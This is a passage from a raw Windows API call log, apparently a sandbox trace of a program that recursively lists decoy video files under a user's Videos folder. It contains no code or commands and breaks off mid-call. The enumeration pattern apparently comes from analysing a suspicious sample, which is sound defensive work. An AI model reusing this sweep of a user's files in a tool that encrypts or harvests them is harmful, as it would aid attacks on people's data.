ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf98de0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf98de0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.520] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf98de0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf98de0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0184.520] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.520] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.520] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.520] lstrlenW (lpString="desktop.ini") returned 11 [0184.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gpun dCJ fuTRp38Be4\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e231cb0, ftCreationTime.dwHighDateTime=0x1d5d9a0, ftLastAccessTime.dwLowDateTime=0x9240ac0, ftLastAccessTime.dwHighDateTime=0x1d5e26c, ftLastWriteTime.dwLowDateTime=0x9240ac0, ftLastWriteTime.dwHighDateTime=0x1d5e26c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.520] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e231cb0, ftCreationTime.dwHighDateTime=0x1d5d9a0, ftLastAccessTime.dwLowDateTime=0x9240ac0, ftLastAccessTime.dwHighDateTime=0x1d5e26c, ftLastWriteTime.dwLowDateTime=0x9240ac0, ftLastWriteTime.dwHighDateTime=0x1d5e26c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.521] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.521] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x232c9690, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0xc2e70b60, ftLastAccessTime.dwHighDateTime=0x1d5db3c, ftLastWriteTime.dwLowDateTime=0xc2e70b60, ftLastWriteTime.dwHighDateTime=0x1d5db3c, nFileSizeHigh=0x0, nFileSizeLow=0x701, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="eCr7IZOcmAN94aLfOkt.swf", cAlternateFileName="ECR7IZ~1.SWF")) returned 1 [0184.521] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.521] lstrlenW (lpString="eCr7IZOcmAN94aLfOkt.swf") returned 23 [0184.521] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.521] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.521] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e74070, ftCreationTime.dwHighDateTime=0x1d5e11c, ftLastAccessTime.dwLowDateTime=0xd5aee230, ftLastAccessTime.dwHighDateTime=0x1d5d827, ftLastWriteTime.dwLowDateTime=0xd5aee230, ftLastWriteTime.dwHighDateTime=0x1d5d827, nFileSizeHigh=0x0, nFileSizeLow=0x18669, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="I_nAi8fonH9F_i7d6ED.mp4", cAlternateFileName="I_NAI8~1.MP4")) returned 1 [0184.521] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.521] lstrlenW (lpString="I_nAi8fonH9F_i7d6ED.mp4") returned 23 [0184.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QGaodbhsY\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fcd7c0, ftCreationTime.dwHighDateTime=0x1d5e0e2, ftLastAccessTime.dwLowDateTime=0x23496660, ftLastAccessTime.dwHighDateTime=0x1d5e31c, ftLastWriteTime.dwLowDateTime=0x23496660, ftLastWriteTime.dwHighDateTime=0x1d5e31c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.521] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39fcd7c0, ftCreationTime.dwHighDateTime=0x1d5e0e2, ftLastAccessTime.dwLowDateTime=0x23496660, ftLastAccessTime.dwHighDateTime=0x1d5e31c, ftLastWriteTime.dwLowDateTime=0x23496660, ftLastWriteTime.dwHighDateTime=0x1d5e31c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.521] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.521] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55210240, ftCreationTime.dwHighDateTime=0x1d5e2f1, ftLastAccessTime.dwLowDateTime=0x4559f4b0, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0x4559f4b0, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x21fd, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="-Hx2Q8Bm.mp4", cAlternateFileName="")) returned 1 [0184.521] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.521] lstrlenW (lpString="-Hx2Q8Bm.mp4") returned 12 [0184.522] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.522] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.522] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecc3f270, ftCreationTime.dwHighDateTime=0x1d5e40d, ftLastAccessTime.dwLowDateTime=0x7bdadbd0, ftLastAccessTime.dwHighDateTime=0x1d5dc76, ftLastWriteTime.dwLowDateTime=0x7bdadbd0, ftLastWriteTime.dwHighDateTime=0x1d5dc76, nFileSizeHigh=0x0, nFileSizeLow=0xb0d4, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="WkViNYe9rt6h.mkv", cAlternateFileName="WKVINY~1.MKV")) returned 1 [0184.522] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.522] lstrlenW (lpString="WkViNYe9rt6h.mkv") returned 16 [0184.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da98c0, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xd5f94840, ftLastAccessTime.dwHighDateTime=0x1d5dbc2, ftLastWriteTime.dwLowDateTime=0xd5f94840, ftLastWriteTime.dwHighDateTime=0x1d5dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.522] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da98c0, ftCreationTime.dwHighDateTime=0x1d5e4be, ftLastAccessTime.dwLowDateTime=0xd5f94840, ftLastAccessTime.dwHighDateTime=0x1d5dbc2, ftLastWriteTime.dwLowDateTime=0xd5f94840, ftLastWriteTime.dwHighDateTime=0x1d5dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.522] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.522] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27caa600, ftCreationTime.dwHighDateTime=0x1d5ddbc, ftLastAccessTime.dwLowDateTime=0x753be6b0, ftLastAccessTime.dwHighDateTime=0x1d5db0f, ftLastWriteTime.dwLowDateTime=0x753be6b0, ftLastWriteTime.dwHighDateTime=0x1d5db0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="kK7trP1j4OhT_U_cKITH", cAlternateFileName="KK7TRP~1")) returned 1 [0184.522] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.522] lstrlenW (lpString="kK7trP1j4OhT_U_cKITH") returned 20 [0184.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27caa600, ftCreationTime.dwHighDateTime=0x1d5ddbc, ftLastAccessTime.dwLowDateTime=0x753be6b0, ftLastAccessTime.dwHighDateTime=0x1d5db0f, ftLastWriteTime.dwLowDateTime=0x753be6b0, ftLastWriteTime.dwHighDateTime=0x1d5db0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x720036, dwReserved1=0x640050, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.523] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x27caa600, ftCreationTime.dwHighDateTime=0x1d5ddbc, ftLastAccessTime.dwLowDateTime=0x753be6b0, ftLastAccessTime.dwHighDateTime=0x1d5db0f, ftLastWriteTime.dwLowDateTime=0x753be6b0, ftLastWriteTime.dwHighDateTime=0x1d5db0f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="..", cAlternateFileName="")) returned 1 [0184.523] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.523] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8107c1c0, ftCreationTime.dwHighDateTime=0x1d5d9a8, ftLastAccessTime.dwLowDateTime=0x7d82f290, ftLastAccessTime.dwHighDateTime=0x1d5d8bd, ftLastWriteTime.dwLowDateTime=0x7d82f290, ftLastWriteTime.dwHighDateTime=0x1d5d8bd, nFileSizeHigh=0x0, nFileSizeLow=0x6ceb, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="DuzaOT6Ag2.flv", cAlternateFileName="DUZAOT~1.FLV")) returned 1 [0184.523] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.523] lstrlenW (lpString="DuzaOT6Ag2.flv") returned 14 [0184.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\*", lpFindFileData=0x704ac0 | out: lpFindFileData=0x704ac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1aabab0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x9b5afbc0, ftLastAccessTime.dwHighDateTime=0x1d5d906, ftLastWriteTime.dwLowDateTime=0x9b5afbc0, ftLastWriteTime.dwHighDateTime=0x1d5d906, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6e0065, dwReserved1=0x5f0064, cFileName=".", cAlternateFileName="")) returned 0x6ebde0 [0184.523] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x704ac0 | out: lpFindFileData=0x704ac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1aabab0, ftCreationTime.dwHighDateTime=0x1d5e465, ftLastAccessTime.dwLowDateTime=0x9b5afbc0, ftLastAccessTime.dwHighDateTime=0x1d5d906, ftLastWriteTime.dwLowDateTime=0x9b5afbc0, ftLastWriteTime.dwHighDateTime=0x1d5d906, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6e0065, dwReserved1=0x5f0064, cFileName="..", cAlternateFileName="")) returned 1 [0184.523] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.524] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x704ac0 | out: lpFindFileData=0x704ac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5df72900, ftCreationTime.dwHighDateTime=0x1d5d8ef, ftLastAccessTime.dwLowDateTime=0x549da720, ftLastAccessTime.dwHighDateTime=0x1d5dcbf, ftLastWriteTime.dwLowDateTime=0x549da720, ftLastWriteTime.dwHighDateTime=0x1d5dcbf, nFileSizeHigh=0x0, nFileSizeLow=0xc142, dwReserved0=0x6e0065, dwReserved1=0x5f0064, cFileName="-k70s6NAEPzOgko0K4R.swf", cAlternateFileName="-K70S6~1.SWF")) returned 1 [0184.524] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.524] lstrlenW (lpString="-k70s6NAEPzOgko0K4R.swf") returned 23 [0184.524] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\dKNfjQUJ\\*", lpFindFileData=0x713ff0 | out: lpFindFileData=0x713ff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x914ca030, ftCreationTime.dwHighDateTime=0x1d5e747, ftLastAccessTime.dwLowDateTime=0xc2d2f300, ftLastAccessTime.dwHighDateTime=0x1d5d9cf, ftLastWriteTime.dwLowDateTime=0xc2d2f300, ftLastWriteTime.dwHighDateTime=0x1d5d9cf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebe20 [0184.524] FindNextFileW (in: hFindFile=0x6ebe20, lpFindFileData=0x713ff0 | out: lpFindFileData=0x713ff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x914ca030, ftCreationTime.dwHighDateTime=0x1d5e747, ftLastAccessTime.dwLowDateTime=0xc2d2f300, ftLastAccessTime.dwHighDateTime=0x1d5d9cf, ftLastWriteTime.dwLowDateTime=0xc2d2f300, ftLastWriteTime.dwHighDateTime=0x1d5d9cf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.524] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.524] FindNextFileW (in: hFindFile=0x6ebe20, lpFindFileData=0x713ff0 | out: lpFindFileData=0x713ff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72358a40, ftCreationTime.dwHighDateTime=0x1d5e530, ftLastAccessTime.dwLowDateTime=0x115d8d60, ftLastAccessTime.dwHighDateTime=0x1d5de3e, ftLastWriteTime.dwLowDateTime=0x115d8d60, ftLastWriteTime.dwHighDateTime=0x1d5de3e, nFileSizeHigh=0x0, nFileSizeLow=0xfbca, dwReserved0=0x0, dwReserved1=0x0, cFileName="1uVt.mkv", cAlternateFileName="")) returned 1 [0184.524] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.524] lstrlenW (lpString="1uVt.mkv") returned 8 [0184.525] FindClose (in: hFindFile=0x6ebe20 | out: hFindFile=0x6ebe20) returned 1 [0184.525] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713ff0 | out: hHeap=0x6b0000) returned 1 [0184.525] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x704ac0 | out: lpFindFileData=0x704ac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf722420, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0x7825b5f0, ftLastAccessTime.dwHighDateTime=0x1d5e5e0, ftLastWriteTime.dwLowDateTime=0x7825b5f0, ftLastWriteTime.dwHighDateTime=0x1d5e5e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6e0065, dwReserved1=0x5f0064, cFileName="Gxp4I0DkC8Jc4mAEt6", cAlternateFileName="GXP4I0~1")) returned 1 [0184.525] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.525] lstrlenW (lpString="Gxp4I0DkC8Jc4mAEt6") returned 18 [0184.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\*", lpFindFileData=0x713ff0 | out: lpFindFileData=0x713ff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf722420, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0x7825b5f0, ftLastAccessTime.dwHighDateTime=0x1d5e5e0, ftLastWriteTime.dwLowDateTime=0x7825b5f0, ftLastWriteTime.dwHighDateTime=0x1d5e5e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebe20 [0184.525] FindNextFileW (in: hFindFile=0x6ebe20, lpFindFileData=0x713ff0 | out: lpFindFileData=0x713ff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf722420, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0x7825b5f0, ftLastAccessTime.dwHighDateTime=0x1d5e5e0, ftLastWriteTime.dwLowDateTime=0x7825b5f0, ftLastWriteTime.dwHighDateTime=0x1d5e5e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.525] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.525] FindNextFileW (in: hFindFile=0x6ebe20, lpFindFileData=0x713ff0 | out: lpFindFileData=0x713ff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31eb98a0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x9f9af000, ftLastAccessTime.dwHighDateTime=0x1d5e4e6, ftLastWriteTime.dwLowDateTime=0x9f9af000, ftLastWriteTime.dwHighDateTime=0x1d5e4e6, nFileSizeHigh=0x0, nFileSizeLow=0x163b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="hMlZ.avi", cAlternateFileName="")) returned 1 [0184.525] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.525] lstrlenW (lpString="hMlZ.avi") returned 8 [0184.526] FindClose (in: hFindFile=0x6ebe20 | out: hFindFile=0x6ebe20) returned 1 [0184.526] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713ff0 | out: hHeap=0x6b0000) returned 1 [0184.526] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x704ac0 | out: lpFindFileData=0x704ac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedea6250, ftCreationTime.dwHighDateTime=0x1d5e684, ftLastAccessTime.dwLowDateTime=0x224b88c0, ftLastAccessTime.dwHighDateTime=0x1d5e087, ftLastWriteTime.dwLowDateTime=0x224b88c0, ftLastWriteTime.dwHighDateTime=0x1d5e087, nFileSizeHigh=0x0, nFileSizeLow=0x16ef2, dwReserved0=0x6e0065, dwReserved1=0x5f0064, cFileName="NR4sO2n6QsBXY.mp4", cAlternateFileName="NR4SO2~1.MP4")) returned 1 [0184.526] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.526] lstrlenW (lpString="NR4sO2n6QsBXY.mp4") returned 17 [0184.526] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\sc-TmIuTTHwS8WY1KTL_\\*", lpFindFileData=0x714120 | out: lpFindFileData=0x714120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7567b6d0, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xedc66b0, ftLastAccessTime.dwHighDateTime=0x1d5d9de, ftLastWriteTime.dwLowDateTime=0xedc66b0, ftLastWriteTime.dwHighDateTime=0x1d5d9de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebe20 [0184.526] FindNextFileW (in: hFindFile=0x6ebe20, lpFindFileData=0x714120 | out: lpFindFileData=0x714120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7567b6d0, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xedc66b0, ftLastAccessTime.dwHighDateTime=0x1d5d9de, ftLastWriteTime.dwLowDateTime=0xedc66b0, ftLastWriteTime.dwHighDateTime=0x1d5d9de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.526] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.527] FindNextFileW (in: hFindFile=0x6ebe20, lpFindFileData=0x714120 | out: lpFindFileData=0x714120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e198630, ftCreationTime.dwHighDateTime=0x1d5e5dc, ftLastAccessTime.dwLowDateTime=0x34ca7600, ftLastAccessTime.dwHighDateTime=0x1d5e802, ftLastWriteTime.dwLowDateTime=0x34ca7600, ftLastWriteTime.dwHighDateTime=0x1d5e802, nFileSizeHigh=0x0, nFileSizeLow=0xe2d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="8izqR SIPbJ.avi", cAlternateFileName="8IZQRS~1.AVI")) returned 1 [0184.527] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.527] lstrlenW (lpString="8izqR SIPbJ.avi") returned 15 [0184.527] FindClose (in: hFindFile=0x6ebe20 | out: hFindFile=0x6ebe20) returned 1 [0184.527] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x714120 | out: hHeap=0x6b0000) returned 1 [0184.527] FindNextFileW (in: hFindFile=0x6ebde0, lpFindFileData=0x704ac0 | out: lpFindFileData=0x704ac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7567b6d0, ftCreationTime.dwHighDateTime=0x1d5dafd, ftLastAccessTime.dwLowDateTime=0xedc66b0, ftLastAccessTime.dwHighDateTime=0x1d5d9de, ftLastWriteTime.dwLowDateTime=0xedc66b0, ftLastWriteTime.dwHighDateTime=0x1d5d9de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6e0065, dwReserved1=0x5f0064, cFileName="sc-TmIuTTHwS8WY1KTL_", cAlternateFileName="SC-TMI~1")) returned 0 [0184.527] FindClose (in: hFindFile=0x6ebde0 | out: hFindFile=0x6ebde0) returned 1 [0184.527] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704ac0 | out: hHeap=0x6b0000) returned 1 [0184.527] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d61e0d0, ftCreationTime.dwHighDateTime=0x1d5dc3e, ftLastAccessTime.dwLowDateTime=0xfa857700, ftLastAccessTime.dwHighDateTime=0x1d5e32a, ftLastWriteTime.dwLowDateTime=0xfa857700, ftLastWriteTime.dwHighDateTime=0x1d5e32a, nFileSizeHigh=0x0, nFileSizeLow=0x1394a, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="EgO9waftlEApQVYHLuz1.avi", cAlternateFileName="EGO9WA~1.AVI")) returned 1 [0184.527] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.527] lstrlenW (lpString="EgO9waftlEApQVYHLuz1.avi") returned 24 [0184.528] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.528] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.528] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c190990, ftCreationTime.dwHighDateTime=0x1d5e6c5, ftLastAccessTime.dwLowDateTime=0x2c2cbba0, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0x2c2cbba0, ftLastWriteTime.dwHighDateTime=0x1d5e322, nFileSizeHigh=0x0, nFileSizeLow=0x1747f, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="mWiSfX.flv", cAlternateFileName="")) returned 1 [0184.528] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.528] lstrlenW (lpString="mWiSfX.flv") returned 10 [0184.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\YCDk\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe06e64c0, ftCreationTime.dwHighDateTime=0x1d5e1e1, ftLastAccessTime.dwLowDateTime=0x380edef0, ftLastAccessTime.dwHighDateTime=0x1d5e299, ftLastWriteTime.dwLowDateTime=0x380edef0, ftLastWriteTime.dwHighDateTime=0x1d5e299, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x720036, dwReserved1=0x640050, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.528] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe06e64c0, ftCreationTime.dwHighDateTime=0x1d5e1e1, ftLastAccessTime.dwLowDateTime=0x380edef0, ftLastAccessTime.dwHighDateTime=0x1d5e299, ftLastWriteTime.dwLowDateTime=0x380edef0, ftLastWriteTime.dwHighDateTime=0x1d5e299, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x720036, dwReserved1=0x640050, cFileName="..", cAlternateFileName="")) returned 1 [0184.528] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.528] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x704750 | out: 